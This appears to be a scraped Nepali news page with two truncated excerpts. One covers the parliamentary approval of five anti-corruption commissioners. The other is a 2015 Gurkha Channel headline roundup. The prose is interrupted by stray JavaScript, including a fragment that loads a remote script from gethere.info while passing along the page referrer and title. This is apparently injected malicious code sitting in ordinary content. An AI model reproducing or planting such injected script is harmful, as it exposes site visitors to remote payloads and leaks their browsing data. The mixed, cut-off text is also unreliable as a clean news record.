Author: rajendra bhatta

अख्तियारका प्रस्तावित पाँचै जना आयुक्तको अनुमोदन

संसदीय सुनुवाइ विशेष समितिले अख्तियार दुरुपयोग अनुसन्धान आयोगको आयुक्तका लागि प्रस्तावित पाँचै जनालाई सर्वसम्मतिले अनुमोदन गरेको छ । समितिको आजको बैठकले दीप बस्न्यात, नवीनकुमार घिमिरे, डा गणेशराज जोशी, राजनारायण पाठक र सावित्री गुरुङलाई आयुक्तमा अनुमोदन गरेको हो । आयुक्तमा अनुमोदित व्यक्तिहरूमध्ये बस्न्यात, घिमिरे र जोशी विभिन्न मन्त्रालयको सचिवका रुपमा सेवा गरेर निवृत्त भएका हुन् भने भने पाठक नायब महान्यायाधिवक्ताबाट सेवा निवृत्त भएका हुन् । श्रीमती गुरुङ त्रिभुवन विश्वविद्यालयका प्राध्यापक हुन् । सुनुवाइ समितिमा उनीहरूले अख्तियारका कामकारबाहीलाई प्रभावकारी बनाउन अनुसन्धान पद्धतिमा सुधार ल्याउने र भ्रष्टाचार नियन्त्रण गर्ने, अख्तियारको जिम्मेवारीलाई पूर्णता दिन राजनीतिक नेतृत्वबाट समेत इच्छाशक्ति र प्रतिबद्धता आउनु आवश्यक भएकामा जोड दिए । संवैधानिक परिषद्को सिफारिसअनुसार केही साताअघि उनीहरूको नाम सुनुवाइका निम्ति समितिमा प्रस्तुत गरिएको थियो । नेपालको अन्तरिम संविधान, २०६३ अनुसार संसदीय सुनुवाइबाट अनुमोदन भएका पदाधिकारीहरूलाई राष्ट्रपतिले नियुक्ति गर्ने प्रावधान छ । रासस } else...

Read More

Gurkha Channel News 28 03 2015

प्रधानमन्त्री पुगे एमाले अध्यक्ष ओली भेट्न उनको निबास । संबिधान निर्माणका बिषय छलफल भएको जानकारी नेपाली उत्पादनला बिदेशी बजारको खाचो । सरकार तथा बिदेशमा रहेका नेपाली सहयोगी बन्नु पर्नेमा जोड । सात दिन देखी अनसनमा रहेका डा गोबिन्द केसीको स्बास्थ्य अबस्थामा समस्या । राजनितीक दलहरुको ऐक्यबद्वता आउन सुरु । नोबेल शान्ति पुस्कार बिजेता सामाजिक अभियन्ता कैलास सत्यार्थी नेपालमा पाकिस्तानी नोबेल शान्ति पुस्कार बिजेता मलाला लाई लुम्बिनी भम्रणको निम्तो । बढ्यो नेपालमा ठगि धन्दा । फलाम लाई सुन भनेर १५ लाखमा बेच्ने काठमान्डौमा पक्राउ । s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) +...

Read More